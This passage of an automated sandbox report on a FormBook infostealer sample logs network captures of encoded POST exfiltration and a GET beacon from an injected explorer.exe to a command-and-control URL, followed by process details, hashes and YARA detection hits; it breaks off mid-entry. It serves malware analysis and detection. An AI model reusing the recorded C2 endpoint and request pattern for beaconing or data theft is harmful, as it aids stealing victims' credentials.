Jun 21, 2022 21:09:19.031171083 CEST	11183	OUT	POST /uem3/ HTTP/1.1 Host: www.homesteaddesignstudio.net Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.homesteaddesignstudio.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.homesteaddesignstudio.net/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 52 35 52 61 46 39 38 48 77 4d 54 62 77 6d 35 43 6b 53 4b 6f 4c 38 4d 6b 68 57 6f 32 4d 68 62 2d 44 45 51 2d 38 6a 72 4f 79 65 50 34 45 47 50 5a 56 49 4b 6d 72 2d 62 49 61 6f 63 73 55 42 77 64 4a 71 35 67 42 47 42 69 62 6c 69 79 36 72 28 71 36 5a 65 39 42 74 39 71 57 78 61 4a 73 4f 37 61 45 68 42 6a 4b 34 32 6b 62 4d 45 43 37 7a 58 37 41 4a 7e 47 69 47 39 41 68 6d 73 48 41 32 4a 6e 6a 6d 4b 59 63 6f 46 68 4a 76 48 31 58 64 32 31 4c 61 31 62 4f 67 4b 5f 42 68 79 53 6b 44 6c 53 30 51 46 65 4f 66 32 43 66 56 55 74 76 75 28 50 51 69 74 6a 41 46 7e 35 7e 72 49 43 53 36 4d 68 70 33 5a 51 49 6b 6a 36 73 56 66 5a 71 48 45 6e 54 7a 66 34 55 6b 68 32 4e 54 6a 39 5a 37 4b 2d 28 32 30 30 41 6c 4c 61 33 57 6e 6c 49 6f 4f 32 65 6f 38 47 72 59 57 6e 47 38 61 79 7a 31 59 51 51 5a 46 51 32 71 67 65 77 59 58 6b 33 5f 49 5f 78 2d 38 2d 32 55 71 59 33 45 7e 52 67 79 7a 64 6c 34 73 56 6b 62 39 6b 28 65 5a 4e 71 5a 76 31 6f 50 56 49 4f 31 36 72 62 43 70 65 56 5a 6d 65 7a 56 58 6b 32 76 79 63 52 63 38 50 61 55 37 74 65 70 65 61 76 53 37 6d 42 58 74 4f 52 4c 63 77 35 6d 67 70 57 75 30 30 34 45 45 4b 56 4d 70 37 76 4a 4e 35 79 77 5a 2d 79 4a 34 6a 74 31 6c 34 69 37 64 68 47 59 61 57 31 6d 34 67 44 63 4e 38 37 57 62 77 28 52 57 70 46 63 61 43 59 31 53 4f 6f 68 46 67 49 36 7a 68 45 55 42 68 79 43 52 51 76 6c 77 6b 62 7a 62 66 6b 6f 6a 52 31 36 7a 74 36 65 28 2d 62 4d 67 39 68 70 54 43 55 51 41 4b 30 38 31 47 6d 55 4b 66 66 48 74 7a 32 7a 62 51 28 62 66 6c 47 73 42 69 55 51 4a 4f 54 33 6f 6c 48 57 78 72 78 39 4d 64 33 6e 76 58 43 50 70 4b 37 41 64 35 64 4f 49 47 74 76 47 73 52 32 64 6e 58 46 6a 36 61 6e 43 4a 36 32 46 78 6c 6f 46 4a 68 4a 7e 6e 7a 36 34 31 7a 6a 6f 4b 32 6b 51 33 58 58 6b 72 4d 42 39 48 28 52 4b 36 7a 63 66 68 43 57 48 7a 42 46 78 70 67 31 4e 75 4c 78 51 35 58 39 4d 41 70 74 32 33 55 74 30 7a 66 53 34 4d 32 45 6b 61 74 6a 4a 38 71 73 43 45 33 70 65 4c 41 67 53 4e 6e 70 6e 59 48 5f 76 48 55 4b 68 75 6c 30 5a 41 65 42 36 30 51 42 72 57 36 35 32 67 74 69 66 57 28 70 64 6c 4f 33 47 55 57 4d 52 43 32 36 75 49 75 43 76 73 30 52 48 43 37 4d 59 47 54 44 6b 73 4a 33 66 38 6a 77 59 6f 53 42 70 37 7a 65 63 7a 47 58 59 50 31 74 46 70 7e 68 50 32 73 4f 34 30 54 45 74 71 54 53 75 59 43 56 6e 39 71 73 61 50 49 71 4e 78 47 61 30 51 32 5f 49 64 71 48 62 6b 6d 6e 49 31 62 48 53 37 6a 46 65 70 37 4c 50 63 4b 4c 6c 64 59 47 76 65 6b 30 7e 33 66 6b 46 63 49 58 68 2d 48 32 75 52 35 64 6f 79 46 63 38 65 36 35 74 33 4d 38 64 76 5a 50 5a 6e 61 4e 7a 73 6e 38 79 6b 58 6c 73 48 76 72 65 66 6b 64 75 6e 5a 61 50 6b 32 57 63 4e 35 6d 76 44 30 4e 63 65 52 4a 34 6c 56 4a 73 65 33 34 41 46 73 62 44 59 7e 32 61 45 6d 4d 46 4b 4b 53 78 50 52 4c 44 45 5a 65 73 68 4b 66 57 43 75 36 6e 45 61 70 6b 6e 46 55 74 72 73 39 54 70 72 57 48 64 62 59 46 5f 44 48 35 6b 6f 75 48 7a 39 58 51 70 35 37 42 5f 46 6c 56 53 32 30 46 67 66 68 4f 4b 32 4e 65 31 33 4d 46 77 66 4b 52 6f 53 79 6a 7a 79 78 75 41 35 39 6e 75 58 4e 6f 37 71 6f 75 4a 47 38 39 66 6a 79 53 33 52 4e 6d 71 7e 7a 43 7a 7e 34 57 54 6c 4e 58 6f 44 59 66 67 45 38 67 6c 54 44 49 42 68 61 6b 6e 66 33 58 58 69 46 4d 63 35 6f 68 55 32 45 6b 5a 63 39 42 4f 36 61 78 33 28 47 73 5f 49 46 44 73 6b 2d 41 50 48 68 4b 58 77 6f 79 50 75 73 61 53 4c 6e 54 71 71 48 51 69 56 54 62 56 66 76 43 44 6d 44 48 66 44 4a 39 4d 70 7a 72 37 32 6f 4e 70 4b 68 45 50 75 6b 49 34 51 70 55 69 6b 6b 33 37 69 43 32 51 59 4a 6e 56 69 5a 65 77 47 6e 4f 48 44 76 33 38 63 53 39 56 65 61 6d 61 42 34 43 43 4b 52 56 55 31 69 4d 32 36 74 69 74 6d 4c 54 4b 38 48 46 50 69 51 74 69 56 6c 36 37 59 6e 44 77 28 55 52 42 35 72 30 6f 79 56 43 72 6e 69 6f 7a 33 52 42 65 6f 4d 70 54 73 58 46 46 6c 43 63 66 55 69 71 53 77 79 66 68 32 65 4d 5a 38 63 4d 6a 4c 38 74 30 78 4b 63 5f 68 65 50 78 65 47 61 63 57 31 5a 75 78 4d 4d 75 35 66 6e 49 54 33 49 63 7a 41 68 48 50 64 51 67 7e 2d 44 72 49 54 61 59 31 43 46 44 37 4e 31 33 68 79 6e 30 4c 51 66 37 55 6f 47 34 75 6c 51 5f 55 5f 32 4a 31 58 6b 4e 32 46 50 38 45 54 34 36 35 64 6c 38 70 45 4d 72 53 4d 57 32 77 4a 70 5f 70 6e 36 72 64 56 65 33 46 33 56 68 71 5a 50 67 34 36 65 4a 70 68 4a 6d 47 42 4e 38 61 4b 32 Data Ascii: BpE=R5RaF98HwMTbwm5CkSKoL8MkhWo2Mhb-DEQ-8jrOyeP4EGPZVIKmr-bIaocsUBwdJq5gBGBibliy6r(q6Ze9Bt9qWxaJsO7aEhBjK42kbMEC7zX7AJ~GiG9AhmsHA2JnjmKYcoFhJvH1Xd21La1bOgK_BhySkDlS0QFeOf2CfVUtvu(PQitjAF~5~rICS6Mhp3ZQIkj6sVfZqHEnTzf4Ukh2NTj9Z7K-(200AlLa3WnlIoO2eo8GrYWnG8ayz1YQQZFQ2qgewYXk3_I_x-8-2UqY3E~Rgyzdl4sVkb9k(eZNqZv1oPVIO16rbCpeVZmezVXk2vycRc8PaU7tepeavS7mBXtORLcw5mgpWu004EEKVMp7vJN5ywZ-yJ4jt1l4i7dhGYaW1m4gDcN87Wbw(RWpFcaCY1SOohFgI6zhEUBhyCRQvlwkbzbfkojR16zt6e(-bMg9hpTCUQAK081GmUKffHtz2zbQ(bflGsBiUQJOT3olHWxrx9Md3nvXCPpK7Ad5dOIGtvGsR2dnXFj6anCJ62FxloFJhJ~nz641zjoK2kQ3XXkrMB9H(RK6zcfhCWHzBFxpg1NuLxQ5X9MApt23Ut0zfS4M2EkatjJ8qsCE3peLAgSNnpnYH_vHUKhul0ZAeB60QBrW652gtifW(pdlO3GUWMRC26uIuCvs0RHC7MYGTDksJ3f8jwYoSBp7zeczGXYP1tFp~hP2sO40TEtqTSuYCVn9qsaPIqNxGa0Q2_IdqHbkmnI1bHS7jFep7LPcKLldYGvek0~3fkFcIXh-H2uR5doyFc8e65t3M8dvZPZnaNzsn8ykXlsHvrefkdunZaPk2WcN5mvD0NceRJ4lVJse34AFsbDY~2aEmMFKKSxPRLDEZeshKfWCu6nEapknFUtrs9TprWHdbYF_DH5kouHz9XQp57B_FlVS20FgfhOK2Ne13MFwfKRoSyjzyxuA59nuXNo7qouJG89fjyS3RNmq~zCz~4WTlNXoDYfgE8glTDIBhaknf3XXiFMc5ohU2EkZc9BO6ax3(Gs_IFDsk-APHhKXwoyPusaSLnTqqHQiVTbVfvCDmDHfDJ9Mpzr72oNpKhEPukI4QpUikk37iC2QYJnViZewGnOHDv38cS9VeamaB4CCKRVU1iM26titmLTK8HFPiQtiVl67YnDw(URB5r0oyVCrnioz3RBeoMpTsXFFlCcfUiqSwyfh2eMZ8cMjL8t0xKc_hePxeGacW1ZuxMMu5fnIT3IczAhHPdQg~-DrITaY1CFD7N13hyn0LQf7UoG4ulQ_U_2J1XkN2FP8ET465dl8pEMrSMW2wJp_pn6rdVe3F3VhqZPg46eJphJmGBN8aK2Z8wflQN7uXx9bLXiZn9lQnp88TfP1bEnfBkfr0qf07GHrYStXNB72XTlDXOESC2I9hCpTCOlDlTk8tB3T4alXviEH74s15aXaocAt4qH7aG3ig7JzdLvyOcbLNqxOFNn403qgPyBGKMGEZyp-xo5GpZzlh_OJch9RVHNe1m3P37oJ18eBrbcV(nOVXOzB65v4d-AycwolaXBQKIan3IjT6GtdcJXELH1KMEXoJaX9sG9UcAJeylZiLqxJDkgb3somg6LumLUGwwh3C55JW1F7lVR7HObHEFW4wH3AaiBLWz1cMQnRZG35XzrzwwPXbtuZhqLamsq8amvhJNXkJmAiHkilPshL4fJzKQil~8KZ0HyVPP0qHqWExjs_zUnSxG237Of-4IiJ0RMdHyykJ8BWbcx_9EyebCrWzkeuGUScZuI0jMMw4KfSV_Ni5967uUQ1VL7B3lOF3KFOOF5MjTk7yXxufbehEjHpLQm_EJbAr4coXpPMYA91TFLVEs4B0u1h1QpcaH5ixCzX3sIybM6N22hGe9RRMozGqWX9DKwKgBkpmNyZotcdz0N0q7Z20ITy90IdpHfm2RSV0MqVJCi2D4MZ7HErSMtaRI5_89(afWEfoVIcrO01z_(WA_x8KsPPXZILI0Utx4yK9gUQoQ8AyXOvDWE0~vVFtt7mrtE8HNv54bNssYw3REDmoR3Cw18kXrGYECfvNbopfKOes9owYpsj7kY4~nDyNiIvGzOq4qpyu9wg~T3uHtQS6COhC8bcQnz8i3Tply51XU3O2lAHGgLQykiets744MZ3p9OyZcHyiefC9P2GM0pHdjgpkaUMnBx71ckKA6YtqPqpkLOgovXMAs3izKo1M1kmYmttkyfhKlQvpX7-p1rXHJYtcyTUstm2zfEogVndC8pPD1(6yQaPQUkBTWYoHwNfTLNUDH2hXgmGduplsKQb7Po3a_YBepfZjv8rW4HkZ8ssrB7ds5L6Tg~iA-OSoezYQtTFTTilC4TND3CMOUAqBm8tlNUf7XWv7_hFTzYcKqDXGqciXRVVqwsP(dNpmAEPD1dmiu3NnFHZdfg0Y6~YDhJGfA7z~Bld3bnaV51fHVx-eR0CJTWwL7SmT4D_9u8iBkh6gy7lYQZJt2fJCCnVFSY4FJeB~2PdQ8rTImTW2yATqKSKW7Uee9LjYB7iZR3jDR5K6YCj~0CAMuMaIOjUk4uSYrI1cuo8mqubfBxIx4VQsVM7MRn2(TzUYbol79X_YEqAAaeR9fZaCczgdg11GyuNCprjK-ueRDnVmDliJGxknxBni0ECHLBHq0x46YFfnjscUR80(ek1odwnSPud846xNVqGkFHqLOsPPO(nBwfK3w9tihe2YnNRWXYG8ueuHOqhhngN(PeetOKmWCNTuR07UFICsD16CpJHgYvK20YM7EfkH700(c74MCRPXwpr(MjUPe9sq7zMKrKlDGdUDKYrN1m4C4i_~O76ATXuzvDpxGyqigT6IuYluVVum1(mLWpLHgna6s85Bz2nfKmj1IpX1vU1PeXvFeTgg7645W67DaYalj6607z2aw33PeeNVELnrVZWfJ(sUCDUCobDFBwy2NwuveDOZ7nv1PzNa8hOm6SqEEz-O6xnE1tIrnB2Bcb8isMssI(_nN8pGiXFKBD8N9RmKWADtYMJSBZPWHbFvG1tg5PqT5d4N2xD1NjnwAfe8eR-D627jaIyrF1q2QGKNJ8uLR8wQ2Oz18I8RPSuMfqt1OItQEJqiIasxG14gqgGGVP4w_3sgtYZw-zIOUGFjFA972972MiHDq9rzyMH4d0uk3YxHD3gh3gfECV8H-ci7XqIFEcwa8UOUd9VtwHDxxhgYpiG44lgekxxaX6VzxeLMvtPqCWQbVA_0BGY4yHCg0ZOwRgYomXThWSpH3HYuBmZojd2I97bQG0GAKfi~lmB7xiQxn2txMctxu(tlTHHiqIaEG5JtQfQDaEOB6bXv2aSpN4Na8lOWHffWvvOycMBZTLbz13QIFTNaz~VbG6VMBSnA9U5n5xfbFMbHMJOkiZOe711T104gUlcYzRnw5weFIRn7DpROG0oWea3HRTK~eWcq80xVV9ksxDXVPtAuyl6831OLTLalt8AbXz3J02e63YIlu~6OKJR4I(i9x~BBnlyJS~FA8TlpKcNNTIT5Usk6hYQEnJxNSykdEVPfa2pQAo7hVLasslAJHXACQaAo88nx6(EOHpXVRYpIQwF750VAuy1BPj-jj77G45J2Tpp74Ci9Gi77az6T2ZI7MCgcqEvBVZIoLTumlSo6LPviWeEoNOTvDtArjOgnIJPVN9tIUdgt6~d5w6XzTu8nKjqQqPv8ar07dCDuBbf4D0Q2SwmxP56ioOqYZ(EpC43m9ZtZkPwj2qWVoMzX2fSvsr608AOn_Jc3uxzSVfNNUWQON7ZjQ7WhSsdKYwaXieJMiqpuWMqawXdBcDv6txf1PR_Iu8gDckJK-2CFLE8sWy6KXVPlKPGQ8a8ToK5Or0A3HD5mzfvYTgm~Y~ETZS29CHwqswkdiMpOgwxMuJGrnoz075MEjnPtOd6ZyeW~uHE4DgrGqP7LcTan3gKxFLFIukrgYW9expwgUtScIkgI5MjmXWVFv63fIN5FSeGZ8IuZaeg2rgLYwOCj_~oFfBJblI36PmCAimwmZHprEKLZljIfvwTFYZly6ltdepeu743q69YYTn1wddl78czKI
Jun 21, 2022 21:09:19.050020933 CEST	11189	OUT	Data Raw: 30 66 4d 6f 6a 36 77 57 5a 67 70 56 6f 71 79 48 6e 71 54 75 63 54 4e 70 4d 7e 57 46 43 46 68 43 49 57 6e 48 65 42 53 37 44 6d 61 76 67 6c 71 58 67 65 65 57 46 64 56 42 34 63 39 74 76 6e 38 6e 65 42 42 48 41 6a 6e 36 76 6b 32 6b 50 32 6c 41 42 58 Data Ascii: 0fMoj6wWZgpVoqyHnqTucTNpM~WFCFhCIWnHeBS7DmavglqXgeeWFdVB4c9tvn8neBBHAjn6vk2kP2lABXTQpYKrQoVqIOkOpIY1ac7yapjxSuZ5bQgVWRzyfyvTHoACbNAX2miGHAuWCFmfCLv1HWb1_mBg9nvd6q1SQ(oQUv8vhZjmbSZYDohsQ3PbESVX7LK5whXxIDWpn9yd-MdsAzWSNb1SMgiis2MjXDDKKubJzQQrT3r
Jun 21, 2022 21:09:19.050156116 CEST	11194	OUT	Data Raw: 7a 77 4c 78 44 77 66 57 50 7a 35 70 73 44 34 6d 72 47 77 69 78 4f 6a 4b 5a 61 37 67 4f 77 65 43 65 56 32 49 4a 6d 34 38 51 70 76 79 6d 79 36 72 50 48 4a 4a 4d 6d 4d 39 66 4a 31 59 52 4d 71 63 5f 45 44 75 70 52 6e 74 69 75 54 6a 57 34 76 4a 64 6f Data Ascii: zwLxDwfWPz5psD4mrGwixOjKZa7gOweCeV2IJm48Qpvymy6rPHJJMmM9fJ1YRMqc_EDupRntiuTjW4vJdoRvMOAEkCCJ756CPNJixAHDPnnrgPJzsDlcmB1Yibfpx3zWKdnBurNtk8B8jh8TA~_KiFvhAcJWzV-JAMLZPTri1BKqN(c9O3abMLFeDlXqbiq5jEmMsXMD6U4Hil6ousg(a9XLp~N~FXJz-Q0Sw3aUmBdlVhM11X_
Jun 21, 2022 21:09:19.050188065 CEST	11200	OUT	Data Raw: 68 52 69 59 71 54 37 61 70 67 6a 72 48 63 6b 47 32 28 68 7a 31 28 53 41 54 31 5a 30 4c 6a 62 49 72 6d 36 6f 71 77 4c 74 39 4c 2d 6a 4a 33 73 53 64 28 35 73 49 48 56 63 6c 52 79 34 4a 47 55 38 45 41 47 31 4c 41 76 46 6f 52 34 57 4c 46 36 56 38 46 Data Ascii: hRiYqT7apgjrHckG2(hz1(SAT1Z0LjbIrm6oqwLt9L-jJ3sSd(5sIHVclRy4JGU8EAG1LAvFoR4WLF6V8FZ2478vwMyq_ErYocr4hLLHyV4Y3clrgAwne9rIeOWQbbu58(bug1-QJsQW_qwKw0khPKrBT66LNMyux9YQTTRyPVdHGguVMcAOt8nKtVnQRuZOdYkMMcNZXdjONF0vBTlA8F6Q0qnhHKBhvSIJ0Yrprv6X6mWhq(N
Jun 21, 2022 21:09:19.050199032 CEST	11202	OUT	Data Raw: 49 56 78 79 32 4c 49 65 65 61 55 4c 71 6a 38 73 77 73 68 32 56 67 51 66 72 30 6b 61 6a 59 43 50 39 4e 48 4f 5a 75 73 4a 4f 7a 47 50 49 79 35 4a 78 61 2d 35 32 50 38 34 2d 61 73 74 4a 37 72 59 72 37 4f 38 33 4d 54 55 2d 6e 42 35 38 54 37 63 74 6f Data Ascii: IVxy2LIeeaULqj8swsh2VgQfr0kajYCP9NHOZusJOzGPIy5Jxa-52P84-astJ7rYr7O83MTU-nB58T7ctoQc5Yxct0Rn5dRxFs8bsrW6OCJenTrPJZkvEKpPJJ1xF6ExkSjXjvMAVE4KLlum1z3rT11ApwRSZV1B8YGm_myFFaszGFV1tL2G408iFz_Cb2huepH~GD41EZ89gnaoXR3GgslORpN28edlcd8(htz6MSXYt7_7ToP
Jun 21, 2022 21:09:19.050215960 CEST	11205	OUT	Data Raw: 46 47 72 64 41 43 42 54 45 67 31 59 38 48 39 44 72 67 37 41 46 72 44 4d 58 45 46 63 6c 74 37 34 43 32 41 58 75 66 67 43 73 56 4d 33 64 34 4a 66 76 4b 38 6f 32 4b 43 72 4a 70 45 54 32 70 37 7e 43 58 6d 41 76 51 50 58 70 6a 53 6a 51 74 47 76 51 6f Data Ascii: FGrdACBTEg1Y8H9Drg7AFrDMXEFclt74C2AXufgCsVM3d4JfvK8o2KCrJpET2p7~CXmAvQPXpjSjQtGvQoPdS9y4sl3w-4AnRC1MsEE5K(EDTINM-01eB6Aa_QUVLPFm7IgO67O~-lE07KHt-Dg21maaSZ4cGWAvr9KbwuM3uLCOtdTMZ8PhYT9hyLXZj4kYhRp29EslZI_cD5QjFpOsqPQKqqUsYz-a13BoI1LyCULH8BohtXY
Jun 21, 2022 21:09:19.050242901 CEST	11207	OUT	Data Raw: 4f 64 4f 5a 73 4e 6e 69 35 56 31 45 37 4c 6d 4e 79 77 47 61 59 62 4f 53 31 35 45 6f 41 55 6e 70 55 42 4a 79 32 79 5f 74 35 59 67 34 39 6a 34 65 4a 31 72 64 2d 59 49 62 38 6e 6d 34 50 58 75 64 57 49 53 30 4b 67 71 4f 58 74 33 36 6d 77 31 70 33 42 Data Ascii: OdOZsNni5V1E7LmNywGaYbOS15EoAUnpUBJy2y_t5Yg49j4eJ1rd-YIb8nm4PXudWIS0KgqOXt36mw1p3BFSXDWbr~ZLdcI0st-muhQIzokfDQdazXS35(FX5Fb7s0bBZUH3597yLzwBor6TTqrwNN_jjTjbq9IQ7R99Jxt8lvaSktZVWft(0jedWscM0SBtm1vVlf_ItXXktlS4jVdVyWTlStzC7IWwhRvzvfGasTjblOd32z6
Jun 21, 2022 21:09:19.209928989 CEST	11211	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Tue, 21 Jun 2022 19:09:19 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Vb6Xg1wX9h+8IVM6oavKYr4qS3BbvK+Vi/COfO9acqdR24MSbk7eCNrLGCAHjL6MF7/qlIYIOFCuW+qPnUzxfw Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49872	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:19.051846027 CEST	11208	OUT	GET /uem3/?SH=IDKTKDM&BpE=e7lgbbJx7/LPlk8h2XTeLpVDgGYjKiXPdD9XuQrM1srGI3PqQ6DhnuaFHJpKRw83QeNd HTTP/1.1 Host: www.homesteaddesignstudio.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:09:19.170020103 CEST	11210	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 21 Jun 2022 19:09:19 GMT Content-Type: text/html Content-Length: 291 ETag: "629e390f-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: e6o7hKFmfC.exePID: 7104, Parent PID: 4600

General

Target ID:	0
Start time:	21:07:26
Start date:	21/06/2022
Path:	C:\Users\user\Desktop\e6o7hKFmfC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\e6o7hKFmfC.exe"
Imagebase:	0xb90000
File size:	450048 bytes
MD5 hash:	8415DBF0BB48732513140AB0502B0FD2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.463968432.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: e6o7hKFmfC.exePID: 6308, Parent PID: 7104

General

Target ID:	3
Start time:	21:07:37
Start date:	21/06/2022
Path:	C:\Users\user\Desktop\e6o7hKFmfC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\e6o7hKFmfC.exe
Imagebase:	0x4b0000
File size:	450048 bytes
MD5 hash:	8415DBF0BB48732513140AB0502B0FD2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exePID: 684, Parent PID: 6308

General

Target ID:	6
Start time:	21:07:44
Start date:	21/06/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff74fc70000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - 